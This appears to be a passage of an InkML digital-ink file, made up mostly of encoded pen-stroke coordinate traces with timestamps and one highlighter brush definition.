31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47:22.0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08 15795 0,'20'0'16,"19"0"0,21 0-16,-21 0 15,41 0-15,-21 0 16,1 0-16,-20 0 15,-1 0-15,-19 0 16,0 0-16,0 0 16,-20-19-1,20 19 1,-20-2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7T00:47:22.7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13 15637 0,'19'0'47,"1"0"-31,40 0-1,19 0-15,40 0 16,0 0-16,40 0 15,59 0-15,1 19 16,-120-19-16,-40 0 16,-39 0-16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36:02.3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71 11501 0,'141'0'156,"53"0"-156,-35 0 16,53 17-16,35-17 15,-53 0-15,53 0 16,-142 0-16,19 0 16,-89 0-1,0 0 1,-35 18 31,18-18-32,141 35-15,0-17 16,-36-1-16,18 1 16,-35-18-16,35 0 15,-35 0-15,-18 35 16,-35-35-16,18 0 16,34 0-16,-52 0 15,-17 0-15,34 18 16,-17-18-16,18 0 15,-1 18-15,-17-18 16,18 35-16,-1-17 16,36-18-16,-35 17 15,-1-17-15,-17 0 16,0 0-16,-35 0 16,-1 0 15,1 0 0,70 35-15,-17-17-16,52 0 15,1-18-15,-19 0 16,-52 0-16,0 0 16,-17 0-16,16 0 15,1 0-15,-35 0 16,0 0-16,17 0 15,-17 0 1,-1 0-16,19 0 16,-1 0-1,-18 0-15,36-18 16,0 0-16,-17 18 16,-1 0-16,0 0 46,-17 0-14,-1 0 30,1 0-46,0 0 15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36:07.0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54 12876 0,'18'0'78,"-1"0"-62,1-17-1,0 17-15,-1 0 32,1 0-32,0 0 15,35 0 1,52 0-16,37-53 15,34 53-15,0 0 16,36 0-16,17 0 16,71 0-16,-18 0 15,18 0-15,-71 0 16,-52 0-16,-1 0 16,-88 0-16,-35 0 15,-35 0-15,0 0 16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2:21.3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50 15628 0,'18'0'31,"0"0"-31,-1 0 16,1 0-16,35 0 15,0 0-15,0 0 16,-18 0-16,18 0 15,0 0-15,0 0 16,0 0-16,17 0 16,1 0-16,70 0 15,53 0-15,-18 18 16,71-18-16,-17 0 16,-19 0-16,36 17 15,0 36-15,35-53 16,89 53-16,70 0 15,-88-35-15,-54 17 16,1-35-16,18 71 16,-89-36-16,-53-35 15,-52 53-15,-89-53 32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04.3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53 4336,'18'0,"0"0,1 0,-1 0,18-18,-18 18,37 0,-1 0,19 0,17 0,37 0,18 0,55 0,-19 0,55 0,36 0,-54 0,127 18,-91 18,127-17,91 71,-73-90,-55 0,-71 0,-38 18,-35-18,-19 19,-17-19,-55 0,-19 18,-17-18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06.6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24 6005,'36'-18,"0"0,55 0,72 18,37 0,-1-18,55 18,19 0,-19-18,0-1,0 19,18 0,18 0,-36 0,91 0,36 0,-18 0,-128 0,19 0,-36 0,-18 37,-19-37,-18 0,-36 0,0 18,-18 0,18 18,-18-18,-36-18,-19 19,55-19,-55 18,-17-18,-19 0,18 0,-18-18,0-1,19 1,-1 0,-18 0,37 0,-37 18,0 0,0-18,0 18,0 0,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05:05.3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40 4481,'18'0,"18"0,0 0,19 0,17-18,1 18,-19 0,55 0,-54-18,-19 18,0 0,1 0,-1 0,0 0,19 0,17 0,-36 0,19 0,-1 0,-17-18,17 18,0 0,1 0,-1 0,1 0,-1 0,-18 0,1 0,-1 0,-18 0,18 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,17 0,0 0,37 0,17 0,-17 0,18 0,18-18,-19 18,-17 0,-19 0,-17 0,-1 0,-54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08.0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596 5878,'18'0,"0"0,0 0,0 0,0 0,19 0,-1 0,36 0,55 0,19 18,-1 1,36-1,1-18,17 0,1 0,17 0,-35 0,-1 0,1 0,-55 0,-18 18,-55-18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10.5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34 7185,'0'0,"36"-19,0 19,0-18,19 18,17 0,19 0,0 0,-19 0,37 0,0 0,0 0,36 0,-36 0,36 0,-18 0,18 0,0 0,-18 0,0 0,19 0,-19 0,-19 0,19 0,0 0,-18 0,55 0,-19 0,0 0,-36 0,36 0,36 0,-36 0,1 0,-1 0,0 0,18 0,19 18,-37-18,18 0,37 37,-37-37,36 0,-35 18,-1-18,18 36,-35-36,-1 0,-18 18,18-18,-54 0,90 0,-72 0,18 0,18 0,0 18,-18-18,18 0,-18 0,18 0,1 0,-38 0,1 0,-18 0,-18 0,35 0,-35 0,-19 0,1 0,17 0,-17 0,-1 0,19 0,-1 0,-35 19,35-19,1 0,-1 0,1 0,-19 0,19 0,18 0,18 0,-19 0,-17 0,36 0,-37 0,19 0,-37 0,37 0,-36 0,-1 0,0 18,55-18,-36 0,-1 0,37 0,-18 0,18-18,-37 18,55 0,-54 0,18 0,18 0,-37 0,19 0,-37 18,37-18,-55 18,19-18,-19 0,18 0,-17 0,-1 0,0 0,1 0,17 0,0 0,-17 0,17 0,-18 0,19 0,-1 0,1 0,-1 0,-18 0,37 0,-19 18,-35-18,17 0,-18 0,-18 18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15.5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46 8563,'0'0,"91"0,-18 0,17 0,19 0,0 0,36 0,-18 0,37 0,-19 0,0 0,18 0,-18 0,-54 0,54 0,-36 0,-18 0,-1 0,1 0,-36 0,-19 0,-18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17.9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00 8563,'0'0,"36"0,-18 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,18 0,-36 19,55-19,-19 18,0-18,19 0,-1 18,1-18,-1 0,1 0,-1 0,0 0,1 0,-19 0,19 0,-19 0,18 0,-17 0,-1 0,18 18,-17-18,-1 0,-18 0,0 0,0 0,0 0,19 18,-19-18,18 0,-18 0,19 0,-19 0,0 0,0 0,0 0,18 0,1 18,17-18,55 0,-18 0,-19 0,1 0,-1 18,-17-18,-1 0,-17 0,17 0,-18 0,-18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0.2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65 8527,'54'0,"0"0,1 0,-1 0,73 0,-18 18,-54-18,17 0,1 18,-19-18,37 0,-37 0,1 0,-1 0,-18 0,1 0,17 0,-18 0,1 19,-19-19,18 0,0 0,19 0,-19 0,0 18,-17-18,-1 0,18 0,-18 0,0 0,19 0,-1 18,-18-18,0 0,18 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,0 0,18 0,-17 0,35 0,0 0,-17 0,17-18,1 18,-19-18,18 18,1 0,-19 0,0 0,-18 0,19 0,-19 0,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1.1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375 8636,'0'0,"54"0,-18 0,37 0,-1 0,-17 18,-1-18,1 0,-1 0,19 0,-1 18,1-18,36 18,0-18,-19 0,1 0,0 0,-55 0,18 0,1 0,-37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2.9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37 10069,'0'0,"72"0,19-18,0 18,-19 0,37 0,-54 0,-1 0,-36 0,0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4.5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47 10015,'18'0,"36"0,1 0,17 0,1 0,18 0,17 0,-35 0,18 0,18 0,-55 0,37 0,-37 0,19-18,-19 18,19 0,-19 0,-18 0,-17 0,17 0,-18 0,18 0,-18 0,1 0,17 0,-18 0,0 0,0 0,0 0,19 0,-19 0,0 0,0 0,0 0,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5.7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83 9906,'54'0,"19"0,36 0,54 0,18 0,19 0,-37 0,37 0,-55-18,-18 18,-55 0,1 0,-19 0,-17 0,-19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27.0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03 10106,'18'0,"0"0,18 0,1 0,17 0,37 0,36 0,18 0,0 0,0 0,73 0,-37 0,19 0,36 0,18 0,-55 0,19 0,-18 0,-1 0,-36 18,55-18,0 0,54 0,-18 0,18 0,-18 0,73 0,-73 0,36 0,-54-18,-18 18,-19 0,-36 0,-17 0,-19 0,0 0,-37 0,-17 0,-19 0,19 0,-19 0,19 0,-1 18,-17-18,17 0,1 0,36 0,18 0,-18 0,36 0,0 0,18 0,-18 0,1 0,-1 0,-18 0,18 0,0 0,-54 0,-1 0,19 0,-18 0,-18 0,-19 0,0 0,1 0,-1 0,-36 0,37 0,-37 0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7:23.973"/>
    </inkml:context>
    <inkml:brush xml:id="br0">
      <inkml:brushProperty name="width" value="0.08819" units="cm"/>
      <inkml:brushProperty name="height" value="0.35278" units="cm"/>
      <inkml:brushProperty name="color" value="#B4CDE2"/>
      <inkml:brushProperty name="tip" value="rectangle"/>
      <inkml:brushProperty name="rasterOp" value="maskPen"/>
    </inkml:brush>
  </inkml:definitions>
  <inkml:trace contextRef="#ctx0" brushRef="#br0">4082 13934,'37'0,"-1"0,18 0,37 0,0 0,36 0,18 0,54 0,-35 0,90 36,-18 0,72-18,109 37,73-19,36 55,-18-73,-36 36,72-54,1 37,-92-19,-54-18,-90 0,-73 0,36 0,-36 0,-55 0,19 0,-55 0,-18 0,-55 0,-35 0,-1 0,-36-18,18 18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05:07.2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09 4318,'18'0,"19"0,-1 0,18 0,1 0,17 0,1 0,72 0,-36 18,-18-18,36 0,-19 18,38-18,-38 0,38 0,-1 18,-18-18,-18 0,36 0,-36 0,36 0,0 0,-36 0,18 0,-18 0,18 0,-37 0,19 0,-18 0,-19 0,-17 0,-1 0,1 19,17-1,1-18,36 0,0 0,-1 0,1 0,-18 0,-18 0,-1 0,-17 0,17 0,-17 0,35 0,-35 0,35 0,37 0,-54 0,36 0,0 0,-19 0,19 0,-18 0,18 0,-18 0,-1 0,37 0,0 0,0 0,-18 0,18 18,0 0,0 0,-18 0,-18 19,18-37,-1 0,19 0,19-37,-56 37,19 0,18 0,-36 0,18 0,-19 0,19 0,-36 0,-1 0,-17 0,17 0,-17 0,17 0,1 0,0 0,35 0,-35 0,0 0,-1 0,1 0,-1 0,19 0,-37 0,1 0,17 0,-17 0,-19 0,0 0,1 0,-1 0,-18 0,0 0,0 0,1 0,-1 0,0 0,0 0,18 0,-18 0,37 0,-37 0,18 0,-18 0,19 0,-19 0,0 0,0 0,18 0,1 0,-19 0,36 0,-17 0,-19 0,18 0,18 0,-17 0,-19 18,18-18,0 0,-17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30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57 11484,'54'0,"-17"-18,53 18,1 0,18 0,36-18,-18 18,18-18,0 18,19 0,-19 0,0 0,18 0,37 0,-19 0,1 18,35-18,19 0,-18 18,36 0,0-18,0 55,-36-37,-37-18,73 36,-18-36,-37 0,-35 0,35 18,-17-18,17 0,1 0,-37 0,0 0,-17 0,-1 0,0 0,-36 0,18 0,-73 0,-18 0,-17 0,-1 0,0 0,0 0,36 0,1 0,-1 0,-17 0,-1 0,18 0,37-18,0 0,36 18,18 0,-54 0,90 0,-36 0,0 0,19 0,-19 0,0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2:34.1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78 5891 0,'70'0'63,"71"0"-47,18-17-16,-89 17 15,19 0-15,-36 0 16,-18 0-16,-18 0 15,1 0-15,0 0 16,-1 0-16,1 0 16,0 0-16,17 0 15,-17 0-15,35 0 16,-1 0-16,19 0 16,-18 0-16,-18 0 15,0 0 1,1 0-16,-19 0 15,1 0 1,0 0 0,-1-18-1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52:06.1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05 3193 0,'-71'105'63,"-70"19"-48,18 17-15,-18 18 16,0 0-16,88-107 15,-36 90-15,-16-1 16,69-53-16,36-70 16,0 17-16,-35 0 15,35-17 17,0-1-32,71 36 15,17-17 1,88 69-16,18-34 15,71 17-15,17-17 16,141-1-16,71-17 16,0-53-16,71 0 15,17 0-15,-194 0 16,-141 0-16,-71 0 16,-88 0-16,-105-17 78,-54-36-63,-35-36-15,-17-34 16,-71-1-16,88 19 16,-123-54-16,-18-17 15,88 52-15,0 18 16,53-17-16,71 105 15,17 18-15,1-18 16,-1 1 0,18-1-16,-35-17 15,0 0-15,-18-1 16,-53-34-16,53 34 16,-35-16-16,-18-1 15,35 17-15,18 19 16,0-1-16,0-17 15,18 35 1,18 0 93,17-18-93,-36 18 15,19-35-31,-1 17 16,-35-17-16,0-18 16,36 18-16,-36 35 15,35-35-15,0 17 16,1 0-16,-1 18 15,-17-17 17,17 17-32,1-36 15,-1 36-15,-53-17 16,-17-36-16,0 18 16,-53-36-16,17 18 15,1 0-15,-71-35 16,35 70-16,0-52 15,1 52-15,-1-17 16,53 0-16,35 17 16,36 18-16,-35-35 15,52 35 1,0 17 140,18 54-156,89 52 16,52 54-16,-35-1 15,17 18-15,18 106 16,-35-53-16,-18 106 16,-17-142-16,-1 1 15,1-18-15,35-18 16,-53-52-16,-18-36 16,-18-35-16,1-35 15,0 17-15,-1 0 16,1-17-1,0-1-15,-18 1 0,0 0 16,0 35-16,17 0 16,36 17-1,-53-52-15,18 17 16,-18-70 78,0-89-94,0 54 15,0-36-15,0-53 16,0 36-16,0 34 16,0-140-16,53 0 15,-18 53-15,36-54 16,17-70-16,-18 142 15,-17-1-15,-17-18 16,34-34-16,1 17 16,-54 53-16,19 17 15,-19 18-15,1 0 16,-18 71-16,0-18 16,0 18-16,0 0 15,0 17 1,17 18-1,-17-18-15,0 1 32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52:07.0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98 2011 0,'0'17'78,"0"1"-62,-88 35-16,35 35 15,-35 36-15,35-54 16,-17 18-16,-1-35 16,36 0-16,-36-17 15,1 52-15,70-71 16,-36 19-16,19-36 47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39:03.0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66 8184 0,'-18'-17'125,"36"17"-110,-1 0 1,1 0 0,17 0-16,1 0 15,34 0-15,-34 0 16,16 0-16,19 0 15,-18 0-15,17 0 16,19 17-16,16-17 16,19 0-16,17 0 15,-70 0-15,34 0 16,-34 0-16,-36 0 16,-17 0-16,17 0 15,-17 0 1,-1 0-1,1 0 1,0 0 0,-1 0-16,54 0 15,0 0-15,-1 0 16,54 0-16,-36 0 16,-18 18-16,-52-18 15,0 0 79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0:10.4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60 8872 0,'18'0'125,"-1"0"-125,1 0 16,-1 0-1,19 0 17,-19 0-32,19 0 31,-19 0 0,1 0 0,0 0-31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0:33.6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165 9666 0,'-35'0'62,"-53"0"-46,-18 0-16,0 0 15,-35 0-15,0 0 16,-53 0-16,106 0 16,35 0-16,-18 0 15,36 0-15,17 0 16,1 0 0,-1 0-1,1 0-15,-36 0 16,0 0-16,-53 0 15,71 18-15,-89-18 16,89 0-16,-18 0 16,35 0-1,1 17 79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0:51.2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704 9278 0,'71'0'110,"-18"0"-110,35 0 15,0 0-15,-53 18 16,36-18-16,17 17 15,-53-17 1,36 0-16,-18 0 0,-18 36 16,-17-36-1,-1 0 1,1 0 0,-1 0-16,36 0 15,18 0 1,-53 0-16,52 0 15,1 0-15,-18 0 16,0 0-16,-36 0 16,18 17-16,1-17 15,-19 0-15,1 0 16,0 0-16,-1 0 16,1 0-1,0 0 22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1:00.5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54 13917 0,'18'0'93,"-1"0"-77,1 0 0,0 0-1,-1 0 1,1 0-1,17 0 32,-17 0-47,-1 0 94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41.1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81 4445,'0'0,"36"0,-18 18,36 18,55-17,-18-19,72 54,-18-18,-126-36,162 0,19 37,-19-37,37 36,54-18,-36-18,36 54,-54-54,54 0,-18 0,0 0,-18 0,-19 0,1 0,-55 0,-18 0,-54 0,0 0,-73 0,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7:19.2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672 4209,'0'0,"19"0,-1 0,0 0,0 0,0 0,37 0,-1 0,19 0,35 0,19 0,19 0,17 0,18 0,-17 0,-19 0,0 0,18 0,0 0,-54 0,18 0,-36 0,18 0,-37 0,-35 0,-19 0,18 0,-18 0,0 0,1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43.1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44 6042,'18'0,"0"0,18 0,19 18,35-18,19 18,36 0,19-18,17 0,1 18,35-18,55 18,19-18,126 37,18-37,19 0,36 0,-37 18,-90 18,218 73,-146-18,-54-19,55 37,-128-91,1 0,-55 19,-37-19,-17 0,-37-18,0 18,19 0,-55 0,0 0,-55-18,-53 0,-1 0,0 0,18 0,-18 0,0 0,19-18,17 18,-18-18,19 18,-1 0,-17-18,35 0,-17 0,-19-19,18 37,37 0,-18 0,-19-18,0 18,-17-18,-1 0,0 18,-18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45.0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74 6078,'36'-18,"-17"18,35 0,19 0,-1 0,19 0,54 0,0 0,55 0,-37 0,18 0,37 0,0 0,54 36,-54-36,-1 54,-17-35,18 17,-37 0,-54-18,0 19,-54-37,-1 18,-54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46.0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46 7257,'36'0,"19"0,90 0,36-18,37-18,0 36,18 0,-1 0,38-18,-56 18,74 0,-56 0,-35 0,-37 0,-54 0,-36 0,-55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49.0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01 8545,'0'0,"54"0,1 0,17 0,19 0,0 0,18 0,-1 0,38 0,35 0,-72 0,72 0,-36 0,19 0,-19 0,-18 0,36 0,-18 0,-18 0,18 0,-54 0,36 0,-72 0,-37 0,18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50.3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24 8636,'18'0,"18"0,18 0,19 0,18 0,-1 0,56 0,-19 0,18 0,-18 0,36 0,-36 0,18 0,0 0,-36 0,18 0,18 18,-36-18,-36 0,-1 0,-17 0,-37 0,0 0,0 0,18 0,-17 0,-1 0,18 0,0 0,-18 0,1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51.5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59 8745,'18'0,"0"0,37 0,-1 0,19 0,17 0,-17 0,54 0,0 0,18 0,-18 0,-36 0,54 0,-18 0,-55 0,19 0,-36 0,-1 18,-36-18,0 0,0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52.9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070 8582,'19'0,"17"0,0 0,19 0,17 0,19 0,0 0,54 18,0-18,18 0,19 0,17 0,1 0,-1 0,-17 0,-1 0,1 0,17 0,-72-18,-36 18,18 0,-37 0,-35 18,-19-18,18 0,-18 0,0 0,0 0,19 0,17 0,1 0,17 0,37 0,-55 0,1 0,54 18,0 0,-19-18,-17 0,-19 0,1 0,-37 0,0 0,0 0,-18-18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56.8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93 9942,'18'0,"0"0,37 0,-19 0,0 0,1 0,17 0,-18 0,19 0,-1 0,19 0,-37 0,37 0,-19 0,37 0,54 0,-54 0,-55 0,18 0,1 0,-19 0,19 0,-1 0,-18 0,1-18,-19 18,18 0,0 0,19 0,-19 0,-18 0,0 0,0 0,-18-18,19 18,-1 0,0 0,0 0,18 0,1 0,-1 0,18 0,1 0,-1 0,1 0,-19 0,0 0,0 0,-17 0,17 18,18-18,1 0,-37 0,0 0,18 18,-18-18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2:57.9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505 9979,'18'0,"55"0,-19 0,-36 0,18 0,-17 0,35 0,37 0,90 0,-36 0,19 0,-1 0,55 0,-1 0,-17 0,-37 0,0 0,19 0,-73 0,54 0,-54 0,0 36,-37-18,37 0,0 0,-55-18,-35 18,-1-18,18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3:00.3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30 10051,'19'0,"-1"0,0 0,0 0,36 0,1 0,17 0,-17 0,-1 0,19 0,-19 0,1 0,-1 18,19-18,-37 0,73 18,-18-18,36 0,0 19,-37-19,55 0,-18 0,0 0,-54 0,72 0,-36 0,36 0,-18 0,0 0,18 0,0 0,-36 18,-18-18,0 0,18 36,-1-36,-53 0,-1 0,1 0,-1 0,1 18,-1-18,-18 0,37 0,-19 0,1 0,-1 0,19 0,-1 0,-35-18,-1 18,0 0,0 0,-17 0,-1 0,0 0,0 0,0 0,0 0,0 0,1 0,-1 0,0 0,0 0,18 0,-18 0,19 0,-19 0,18 0,-18 0,37 0,-19 0,18 0,-17 0,35 0,-17 0,17 0,-17 0,-1 0,1 0,-19 0,0 0,19 0,-1 0,19 0,-19 0,55 0,-37 0,1 0,18 0,-37 0,1 0,35 18,-17 0,-19-18,19 0,-19 37,1-37,17 36,-17-36,35 18,-35-18,17 36,-17-36,17 18,-35-18,17 0,1 19,-1-19,-18 18,-18-18,1 0,-1 0,-18 18,18-18,0 0,0 0,0-18,0 18,1 0,-1 0,18 0,-18 0,0 0,19 0,-1 0,0 0,0 0,-17 0,17 0,0 0,0 0,1 0,-19 0,0-37,0 37,0 0,-36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7:46.8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919 4481,'36'0,"19"0,-19 0,18 0,1 0,-1 0,37 0,0 0,36 0,0 0,-19 0,19 0,0 0,19 0,-1 0,0 0,-18 0,18 0,-36 0,36 0,-18 0,-18 0,0 0,0 0,-1 0,1 0,18 0,-36 0,-37 0,1 0,-19 18,0-18,1 0,-19 0,0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33:01.4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28 10995,'0'0,"36"0,-18 0,19 0,17 18,0-18,19 0,18 0,18 0,18 0,0 0,18 0,-36 0,18 0,0 0,-37 0,19 0,-54 18,-19-18,-18 0,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6:13.7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51 9966 0,'71'0'125,"158"0"-109,36 0-16,-18 0 15,17 0-15,-17 0 16,18 0-1,-54 35-15,19-35 0,-19 18 16,-17-18 0,-35 18-16,-35-18 15,-36 0-15,35 17 16,-17-17-16,-53 0 16,18 0-16,17 0 15,18 0-15,-36 0 16,18 0-16,53 0 15,-17 35-15,70-17 16,0-18-16,-18 18 16,36-18-16,17 0 15,18 0-15,0 17 16,18 19-16,-124-36 16,35 0-16,-87 0 15,-1 0-15,0 0 16,-53 0-16,-17 0 15,-1 0-15,1 0 16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8:09.1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338 16545 0,'17'0'750,"1"0"-688,0 0-46,70 0-16,-18 0 15,54 0-15,-54 0 16,1 0-16,-1 0 16,-34 0-16,17 0 15,-36 0-15,1 0 16,52 0-16,-17 0 15,0 0 1,35 0-16,1 0 0,34 0 16,-52 0-1,-36 18-15,53 17 0,-17-35 16,-18 0 0,17 0-16,1 0 15,-1 0-15,1 0 16,-1 0-16,-17 0 15,0 0-15,-17 0 16,-19 0 62,71 0-62,36-17-16,-36-1 15,18 0-15,-71 1 16,0 17-16,-17 0 16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8:09.6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807 16528 0,'-70'0'78,"-36"0"-63,-71 0-15,1 0 16,-212 0-16,123 0 16,54 0-16,52 17 15,-35-17-15,106 0 16,52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8:11.4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92 17709 0,'0'-17'140,"0"-1"-124,36 18-16,-1 0 16,-18 0-16,36 0 15,36-35-15,16 35 16,54-18-16,0 18 15,-18 0-15,18 0 16,17 0-16,-17 0 16,-36 0-16,18 0 15,-17 0-15,-36 0 16,-35 18-16,18-18 16,-54 0-16,1 0 15,0 0-15,-1 0 16,1 0-1,-1 0-15,36 0 16,0 0 15,-35 0-31,17 0 16,0 0-16,1 0 16,17 0-16,17 0 15,1 0-15,17 0 16,18 0-16,-36 0 15,19 0-15,-1-18 16,18 18-16,-1 0 16,-34 0-16,-53 0 15,-1 0-15,1 0 32,0 0-1,-36 0 78,0 0-46,1 0-48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8:29.3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28 11042 0,'17'0'63,"1"0"-63,-1 0 15,36 0-15,-35 0 16,17 0 0,1-18-16,-19 18 15,1 0-15,17 0 16,0-17-1,-17 17 32,0 0-31,-1 0 109,1 0-109,0 0-16,-1-18 15,1 18 32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8:30.1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33 11060 0,'18'0'110,"-1"-18"-95,1 18-15,0 0 16,-1 0 0,1 0-16,0 0 15,-1-18-15,1 18 16,-1 0-1,19 0 1,-19 0 0,19 0-16,-19 0 15,19 0 1,-19 0-16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50:09.7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33 12700 0,'18'0'141,"-1"0"-126,1 0 48,0 0-47,-18-18-1,17 18 79,1 0-32,0 0-30,-1 0 46,1 0-47,-36 0 94,1 0-109,-1 0-1,0 0-15,1 0 16,-1 0-16,0 0 16,1 0 15,-1 0 0,0 18-15,1-18 15,-1 0-31,-17 18 16,17-18-1,1 0 1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50:26.6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55 16334 0,'53'-18'63,"-18"0"-48,18 18-15,-17 0 16,-19 0-16,36 0 16,0 0-16,53 0 15,-53 0-15,17 0 16,18 0-16,-35 0 15,-17 0-15,17 0 16,0 0 0,-18 0-16,-18 0 15,1 0-15,0 0 16,-1-17-16,1 17 16,0 0-1,-1 0 48,1-18-16,0 18 203,-1 0-204,1-18-3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50:28.1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02 16581 0,'0'17'79,"35"-17"-64,1 0-15,-19 0 16,19-17-16,-1 17 15,0 0 1,-17 0 15,-1 0-15,19 0-16,-19 0 16,19 0-1,-19 0 1,36 0-16,0 0 15,-18 0-15,1 0 16,-19 0 0,19 0-16,-19 0 15,54-36 1,-54 19 0,19 17-16,-19 0 3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7:51.8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40 4300,'18'0,"18"0,-18 0,37 0,-1 0,37 0,54 0,55 0,35 0,-17 0,-18 0,17 18,1 0,-36-18,-1 0,0 0,-35 0,-1 0,-18 0,-55 0,19 18,-73-18,0 0,0 0,1 0,-1 0,18 0,0 0,-18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2:34.1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61 12347 0,'71'35'93,"0"-35"-77,-19 0-16,54 18 16,0 35-16,106 0 15,17-35-15,18 35 16,53-36-16,70 54 15,-140-54-15,34 19 16,-70-36-16,0 17 16,0 19-16,-35-36 15,17 0-15,-70 0 16,-18 0-16,-70 0 16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24.3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669 14005 0,'17'-17'125,"1"17"-63,0 0-30,-1 0-17,1 0-15,0 0 31,-1 0 1,1 0-1,0 0 0,-1 0 32,1 0-16,17 0 31,-17 0 15,-1 0-77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26.8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704 13547 0,'-18'0'62,"18"53"-30,0 35-32,0-18 15,0 1-15,0-18 16,18 0-16,-18 17 16,0-17-16,0-35 15,18-1 1,-18 1-16,17 0 15,-17-1 32,0 1-31,0 0-16,18-1 0,-18 1 16,0 0-1,0-1-15,0 1 16,18 0 93,-1-18-109,1 0 63,0 0-1,-1 0-31,1 0-31,17 0 47,-17 0 0,17 0-31,18 0-16,-35-18 15,-1 18-15,1-18 16,-1 1-16,1-1 16,-18 0 15,18 1-15,-18-1-1,0 0 1,0 1-1,0-19 1,0 1-16,-18 35 16,0-35-16,1 0 15,-18 17-15,35-17 16,-36-18-16,19 35 16,-19-35-1,19 53 1,17-17-16,-36-36 15,36 35 1,-17-17-16,-1 17 31,1 18-15,-1-18 15,0 18-15,1-17-1,-19 17 1,19 0 0,-1 0 15,0 0-31,1-18 16,34 18 171,19 35-187,-19-17 16,1 0-16,-18 17 15,53 0 1,-53-17 31,0 17-47,0-17 31,0 0-15,-18-18 124,1 0-124,17-18-16,0-35 16,0 0-16,0 35 93,17 18-46,1 18-31,0 17-1,17 1-15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39.9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08 5997 0,'0'-17'125,"17"17"-109,19 0-16,-36-18 16,35 0-16,0 18 15,-17 0-15,17 0 16,-17 0 15,-1 0-15,1 0-1,0 0 1,17 0 0,-17 0-16,-1 0 15,1 0-15,-1 0 31,1 0-15,0 0 15,17 0-15,-17 0-16,35 0 16,-36 0-1,18 0-15,-17 0 16,17 0 46,-17 0-30,17 0-17,-17 0 1,0 0-16,-1 0 15,1 0-15,17 0 16,-17 0 0,17 0 15,-17 0-15,17 0-1,-17 0-15,-1 0 16,18 0-16,1 0 15,-1 0-15,0 0 16,1 0 0,-36 18-16,17-18 15,1 0 1,17 0 0,-17 0-1,-1 0-15,1 0 16,-18 18-16,18-18 94,17 0-63,-17 0 31,17 0-30,-17 0 14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41.9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05 5891 0,'141'-70'78,"53"70"-62,106-53-16,-53 53 15,176 0-15,212 0 16,-18 0-16,53 0 16,-140 0-16,-54 0 15,-35 0-15,35 0 16,-211 0-16,-36 0 16,-70 0-16,-71 0 15,-70 0-15,-1 0 16,1 0 31,52 18-47,-34-1 15,70 18-15,-36-35 16,54 18-16,34 53 16,-69-71-16,16 17 15,-69-17 32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52.0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065 7585 0,'18'0'281,"87"0"-281,-16 0 16,52 0-16,18-36 15,-71 36-15,35-35 16,-35 35 0,-17-17-16,0 17 15,17-18-15,-53 18 16,36 0-16,-1-18 16,18-17-16,36 35 15,-54-18-15,71 18 16,1 0-16,-19 0 15,18 0-15,-53 0 16,-17 0-16,-18 0 16,0 0-16,-36 0 15,1 0-15,0 0 16,-1 0 31,36 0-32,53-17-15,-18 17 16,71-36-16,-71 19 16,18 17-16,-35-18 15,-19 18-15,-34 0 16,0 0 62,-1-18-31,19 18-31,-19 0-1,1-17 1,17 17-16,36 0 15,35 0-15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3:53.0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357 7479 0,'35'0'78,"-17"0"-78,17 0 15,71-53 1,88 53-16,-36-18 16,37 1-16,16-54 15,1 53-15,-18 1 16,-35-18-16,-1 17 16,-87 0-16,-53 18 15,-1 0-15,1 0 31,-1 0 63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07.3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400 11024 0,'0'18'78,"18"-18"-62,17 0 0,-17 0-1,17 0 1,-17 0-16,-1 0 15,36 0 1,0 0-16,35 0 16,36 0-16,-1 0 15,36 0-15,53 0 16,-71 0-16,0 0 16,0 0-1,-18 0-15,1 0 0,-36 0 16,-17 0-16,35 0 15,-36 0 1,-17 0-16,0 0 16,-18 0-16,18 0 15,18 0-15,-18 0 16,35 0-16,53 0 16,-18 0-16,-34 0 15,34 0-15,-35 0 16,-35 0-16,-18 0 15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11.4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43 9878 0,'18'0'62,"-1"0"-46,1 0 15,-1 0-15,36 0-16,-17 0 15,70 0-15,35-36 16,35 36-16,36 0 15,17 0-15,-17 0 16,-36 0-16,18 0 16,-35 0-16,-18 0 15,0 0-15,-35 0 16,35 0-16,-88 0 16,35 0-1,-53 0-15,-17 0 16,17 0-16,1 0 15,-19 0 1,18 0-16,1 0 16,34 0-16,71-35 15,18 18-15,18 17 16,-19 0-16,36 0 16,-17 0-16,-36 0 15,-18 0-15,36 0 16,-88 0-16,17 0 15,0 0-15,-53 0 16,18 0-16,-35 0 16,-1 0-16,1 0 15,0 0 1,17 0 0,0 0-1,36 0-15,17 0 16,53 0-16,18 0 15,-18 0-15,0 0 16,18 35-16,-36-35 16,-52 17-1,17-17-15,18 53 16,17-53-16,-52 0 16,17 0-16,18 0 15,53 18-15,-53-18 16,52 0-16,-69 0 15,87 0-15,-53 18 16,18 17-16,-17-35 16,-18 0-16,0 0 15,-18 0-15,0 18 16,-17-18-16,-18 0 16,-1 0-16,-16 17 15,-1-17-15,-17 0 16,17 0-16,-17 0 15,17 0 1,-18 0 0,36 0-16,-35 0 15,53 0-15,-1 0 16,1 0-16,52 0 16,-52 36-16,35-36 15,-18 0-15,35 0 16,1 17-1,-36 1-15,71-1 16,-18-17-16,-35 0 16,17 0-16,-35 0 15,18 0-15,-18 0 16,-52 0-16,16 0 16,1 0-16,0 0 15,0 0-15,0 0 16,0 0-16,53 0 15,-18 0-15,53 0 16,53 0-16,-53 0 16,-17 36-16,17-36 15,-18 0-15,18 0 16,-52 0-16,-19 0 16,18 17-16,-35-17 15,-35 0-15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12.5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890 10195 0,'18'0'47,"17"0"0,-18 0-32,19 0-15,-1 0 16,0 0-16,89 0 15,34 0-15,-16 0 16,-19 0-16,-35 0 16,36 0-16,-36 0 15,-35 0-15,-18 0 16,0 0-1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7:52.8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04 4282,'-18'0,"72"0,37 0,-18 0,54 0,-18 0,72 0,0 0,55 0,36 0,-36 0,36 0,-36 0,18 0,55 18,-73-18,36 0,-18 0,-73 0,-18 0,-17 0,-19 0,-73 0,-18 0,-18 0,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13.7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68 11095 0,'53'0'31,"0"0"-15,53 0-16,-18 0 15,1 0-15,-1 0 16,0 0-16,-35 0 16,17 0-16,-17 0 15,0 0-15,0 0 16,-35 0-16,35-18 16,-36 18-16,19 0 15,-19 0-15,19 0 16,-19 0-1,18 0 17,-17 0-17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15.2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61 11024 0,'18'0'31,"0"0"-31,17-17 16,0 17-1,-17-18 1,17 18-16,-17 0 16,17 0-1,-17 0-15,-18-18 16,17 18-16,1 0 16,53 0-1,-1 0-15,71 0 16,-17 0-16,-36 0 15,-35 0-15,35 0 